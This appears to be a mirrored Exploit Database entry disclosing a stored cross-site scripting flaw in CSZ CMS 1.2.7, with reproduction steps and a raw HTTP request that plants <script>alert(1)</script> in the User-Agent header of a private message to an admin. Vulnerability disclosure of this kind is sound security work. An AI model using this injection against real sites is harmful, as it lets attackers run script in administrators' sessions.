CSZ CMS 1.2.7 – Persistent Cross-Site Scripting

• Exploit Database
• 14 阅读

• 作者： Metin Yunus Kandemir
  日期： 2020-04-21
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/48354/

• # Exploit Title: CSZ CMS 1.2.7 - Persistent Cross-Site Scripting
  # Exploit Author: Metin Yunus Kandemir
  # Vendor Homepage: https://www.cszcms.com/
  # Software Link: https://sourceforge.net/projects/cszcms/
  # Version: v1.2.7
  # Description:
  # Unauthorized user that has access private message can embed Javascript
  # code to admin panel.
  
  # Steps to reproduce:
  1- Log in to member panel.
  1- Change user-agent header as <script>alert(1)</script>
  2- Send the private message to admin user.
  3- When admin user logs in to Backend System Dashboard, an alert box pops
  up on screen.
  
  PoC Request:
  
  POST /CSZCMS-V1.2.7/member/insertpm/ HTTP/1.1
  Host: localhost
  User-Agent: <script>alert(1)</script>
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Referer: http://localhost/CSZCMS-V1.2.7/member/newpm
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 152
  Cookie: cszcookie
  Connection: close
  Upgrade-Insecure-Requests: 1
  
  csrf_csz=*&csrf_csz=*&to%5B%5D=1&title=user-agent&message=user-agent&submit=Send